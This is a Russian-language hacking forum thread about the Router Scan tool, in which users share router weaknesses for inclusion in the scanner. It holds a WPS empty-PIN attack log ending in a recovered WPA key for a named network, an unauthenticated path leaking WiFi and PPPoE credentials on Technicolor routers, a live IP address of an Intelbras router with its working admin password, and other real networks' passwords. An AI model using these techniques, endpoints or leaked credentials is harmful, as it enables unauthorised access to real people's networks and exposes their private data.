прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    зайдите сюда днём часов в 12:00 (время Московское) binarymaster вам ответит
     
    Alex Hilgert likes this.
  2. Alex Hilgert

    Alex Hilgert Member

    Joined:
    23 Oct 2017
    Messages:
    11
    Likes Received:
    25
    Reputations:
    0
    Хорошо.
     
    #4782 Alex Hilgert, 28 Oct 2017
    Last edited: 28 Oct 2017
  3. Alex Hilgert

    Alex Hilgert Member

    Joined:
    23 Oct 2017
    Messages:
    11
    Likes Received:
    25
    Reputations:
    0
    ZXHN H108N V2.5 (empty pin)
    00:4A:77:XX:XX:XX
    64:13:6C:XX:XX:XX
    88:D2:74:XX:XX:XX
     
    binarymaster likes this.
  4. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    Оно не упирается, оно показывает статистику активных тредов. Дело в том, что на запуск одного потока необходимо определенное время(причем на каждой машине оно может быть разным) и при этом нельзя запустить мгновенно все потоки - они запускаются последовательно. Вот и получается, что когда запускается, к примеру, 250 поток, то первый поток давно отработал или сдох по таймауту. Если вам в активных тредах нужна такая же цифра, что и в количестве потоков, то увеличите таймаут. Только 750 из 1000 потоков, которые будут ждать ответ от несуществующих вебморд скорости сканирования не прибавят, хотя помогут разгрузить проц.

    Опубликуйте эксплоиты, возможно binarymaster их добавит.
     
    #4784 exzet, 28 Oct 2017
    Last edited: 28 Oct 2017
    AlexUnder2010 likes this.
  5. Hunter17

    Hunter17 New Member

    Joined:
    18 Feb 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Перезалейте пожалуйста на Яндекс , не качается, браузеры перепробовал менять. Благодарю.
     
  6. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    102
    Likes Received:
    97
    Reputations:
    0
    Всё прекрасно качается. В личку скинул на ЯД.
     
    Hunter17 likes this.
  7. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Те же самые грабли.(видимо и вправду глюк, а может так задумано).
    У нас, это точки вида: RT-WiFi_2A33 (7C:26:64:3D:2A:33).
    Это примерно, такой зверр: Airocon F@st 1744, v4, firmware: F1744R_V1.56_RTC_20E_832.
    Только видимо конфиг посвежее. Как басне про Лисицу и виноград. "И видит око, да зуб неймет"(c) И.А. Крылов. :)
    Их полно вокруг, но нет парса, WPS не сдаётся, а сбрутить хендшейк не получается.
    Не удалось нарватся на точку со сменённым провайдерским PSK(а он зверский).
     
    #4787 Kakoluk, 28 Oct 2017
    Last edited: 28 Oct 2017
  8. russstand

    russstand Banned

    Joined:
    5 Jan 2013
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    ну это не прога а вирус какойто :( ну какого она мою собственную точку разместила на карте? я даже не нажимал кнопку заливки на 3wifi, тока просканил 192.168.0-10,100,199.1,254 и всё, ну вот чо терь делать, mac засветил на карте, нафик так делать то :(
     
  9. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    2,301
    Likes Received:
    22,368
    Reputations:
    30
    Значит эту кнопку ты нажал при первом старте программы.
     
  10. CRACK211

    CRACK211 Well-Known Member

    Joined:
    16 Sep 2009
    Messages:
    942
    Likes Received:
    1,052
    Reputations:
    8
    Напишите автору пришлите ему наклейку с роутеру и он Ее удалит из базы. А вообще надо читать с чем соглашаетесь и учить иностранные языки. Это оградит вас от многих проблем)
     
    dragonking, Af5G4337, Mednik and 4 others like this.
  11. LolipopR

    LolipopR New Member

    Joined:
    1 Oct 2017
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Есть такое устройство TP-LINK_POCKET_3020_A335B6, с заводским пином, вот результат -
    18:d6:C7:A3:35:B6 TP-LINK_POCKET_3020_A335B6 WPA2 qwerty78 00000000 -21 dBm 1.0 Yes Wireless Router TL-MR3020 TP-LINK TL-MR3020 1.0
    Почему 8 нулей? В админке пин стоял другой. После того, как я пару раз его сгенерировал WPS - больше не смог подключиться.
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,684
    Likes Received:
    10,042
    Reputations:
    124
    Hello! You can just post URLs of these routers, so I can add them.
    А вот тут вы неправы. Такая возможность есть, и для этого нужно знать документацию. :)
    На заметку: добавляю не только я. ;)
    Насколько я понял, так задумано. Пока кнопку PBC не нажмут, дальше M2 не пойдёт дело.
    У нас с этого года на 3WiFi, политика изменилась, валидные точки не удаляем.

    Два варианта - смириться, или сменить пароль на точке.
    Это вопрос к создателям прошивки... возможно была нажата кнопка PBC.
     
    Triton_Mgn, Payer and Alex Hilgert like this.
  13. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,684
    Likes Received:
    10,042
    Reputations:
    124
    Добавил.
     
  14. Alex Hilgert

    Alex Hilgert Member

    Joined:
    23 Oct 2017
    Messages:
    11
    Likes Received:
    25
    Reputations:
    0
    Поставщик..: Technicolor-Thomson
    Модель.....: TD5136v2
    Url........: $URL/index.cgi
    Описание...: RouterScan не пытается входить в систему с паролями по умолчанию.
    Пароль WiFi, а также логин PPPoE можно извлечь из $URL/wizardoi/ без аутентификации.
    Если вы входите в систему, вы можете извлечь всю информацию, загрузив файл конфигурации в $URL/mnt_config.cgi
    Справка....: https://www.shodan.io/search?query=HTTP/1.0+200+OK+binary:index.cgi


    Vendor.....: Technicolor-Thomson
    Model......: TD5136v2
    Url........: $URL/index.cgi
    Description: The RouterScan don't try to login with default passwords.
    The WiFi password as well as the PPPoE login can be extracted from $URL/wizardoi/ without authentication.
    If you login you can extract all of the information by downloading the config file at $URL/mnt_config.cgi
    Ref........: https://www.shodan.io/search?query=HTTP/1.0+200+OK+binary:index.cgi
     
  15. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    Я имею ввиду, что в один и тот же момент времени нельзя запустить несколько потоков. Это не позволит сделать архитектура винды и процессора. Даже если их запускать из такого же числа дочерних потоков, то фактически процессор будет обрабатывать их запуск последовательно переключаясь между потоками, и это справедливо в том случае, когда количество потоков больше, чем количество ядер.
     
    binarymaster likes this.
  16. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Не знаю может баян..(поиск не указал)
    ESSID: MTSRouter_2D4374
    BSSID:
    Code:
    38:D8:2F:2D:43:74
    Code:
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 418D661A271B56835216AD46199DB780
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: ZTE Corporation
    [*] Model Name: ZXHN H298N
    [*] Model Number: ZXHN H298N
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Modem/Router
    [*] Sending WPS Message M2...
    [*] R-Nonce: 5456882435B54A7C1ADFCB281754AAB0
    [*] PKR: 0ACDBB8B8198430669A942D7AE7E68A847EA773B42C907CE2500A0B87F18A7C81A959758F97AC591F5114B5E203B1AE4FD267FF90B43CF67BF5572FE9207329CC524A4B89B5DBA99E621EB2F49D6728874760E417ECD2AC6ED57C09D88C947E86D3AA762F7D3DEBEDE9401FE8D97BED7AA99053CB58714EC695C840A8DEBBADA74F36E1B039858EAD377D6C8D5C93BABC184C2C063AACF74DE1915070CB3AC59B8EA322DEACCB12A75F8A9A4990C028EE62C0DA6B72A7DF40533CC885CB0B544
    [*] AuthKey: 17D60A4A37E0C0DE71AAF564F8404062F9738962DFC7C8718671AB700B8449B2
    [*] Received WPS Message M1.
    [*] E-Nonce: 418D661A271B56835216AD46199DB780
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: 5456882435B54A7C1ADFCB281754AAB0
    [*] PKR: 0ACDBB8B8198430669A942D7AE7E68A847EA773B42C907CE2500A0B87F18A7C81A959758F97AC591F5114B5E203B1AE4FD267FF90B43CF67BF5572FE9207329CC524A4B89B5DBA99E621EB2F49D6728874760E417ECD2AC6ED57C09D88C947E86D3AA762F7D3DEBEDE9401FE8D97BED7AA99053CB58714EC695C840A8DEBBADA74F36E1B039858EAD377D6C8D5C93BABC184C2C063AACF74DE1915070CB3AC59B8EA322DEACCB12A75F8A9A4990C028EE62C0DA6B72A7DF40533CC885CB0B544
    [*] AuthKey: 17D60A4A37E0C0DE71AAF564F8404062F9738962DFC7C8718671AB700B8449B2
    [*] Received WPS Message M1.
    [*] E-Nonce: 418D661A271B56835216AD46199DB780
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: 5456882435B54A7C1ADFCB281754AAB0
    [*] PKR: 0ACDBB8B8198430669A942D7AE7E68A847EA773B42C907CE2500A0B87F18A7C81A959758F97AC591F5114B5E203B1AE4FD267FF90B43CF67BF5572FE9207329CC524A4B89B5DBA99E621EB2F49D6728874760E417ECD2AC6ED57C09D88C947E86D3AA762F7D3DEBEDE9401FE8D97BED7AA99053CB58714EC695C840A8DEBBADA74F36E1B039858EAD377D6C8D5C93BABC184C2C063AACF74DE1915070CB3AC59B8EA322DEACCB12A75F8A9A4990C028EE62C0DA6B72A7DF40533CC885CB0B544
    [*] AuthKey: 17D60A4A37E0C0DE71AAF564F8404062F9738962DFC7C8718671AB700B8449B2
    [*] Received WPS Message M3.
    [*] E-Hash1: 98DC6D56437834F17FF6D8011313A43B8F4BF6D145A56454E3DD4876081F9851
    [*] E-Hash2: 98DC6D56437834F17FF6D8011313A43B8F4BF6D145A56454E3DD4876081F9851
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Received Identity Request.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Session timed out.
    [+] WPS PIN: <empty>
    [+] SSID: MTSRouter_2D4374
    [+] Key: 99jvxhph
    [+] Key Index: 1
    [*] Audit stopped.
    
    По видимому уязвим к пустому пину.
     
    hydra, Mednik, Triton_Mgn and 2 others like this.
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,684
    Likes Received:
    10,042
    Reputations:
    124
    Добавил. ;)
     
    hydra, Mednik, Triton_Mgn and 2 others like this.
  18. Alex Hilgert

    Alex Hilgert Member

    Joined:
    23 Oct 2017
    Messages:
    11
    Likes Received:
    25
    Reputations:
    0
    Поставщик..: Intelbras
    Модель.....: WRN150 и другие
    вопрос: RouterScan показывает аутентификацию как «admin: admin» и не пытается использовать правильную комбинацию в списке слов, в результате мы не получаем никаких данных.
    Справка....: http://143.255.130.1:8181/

    Vendor.....: Intelbras
    Model......: WRN150 and others
    Issue......: RouterScan show authentication as "admin:admin" and doesn't try the correct combination in the wordlist, as result we get no data;
    Example....: http://143.255.130.1:8181/

    Authentication: admin:upup123
     
    #4798 Alex Hilgert, 28 Oct 2017
    Last edited: 28 Oct 2017
    hydra, Triton_Mgn, CRACK211 and 2 others like this.
  19. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    hydra, binarymaster and Alex Hilgert like this.
  20. Alex Hilgert

    Alex Hilgert Member

    Joined:
    23 Oct 2017
    Messages:
    11
    Likes Received:
    25
    Reputations:
    0
    У меня уже есть пропуск, см. Спойлер для лучшего понимания.
     
Loading...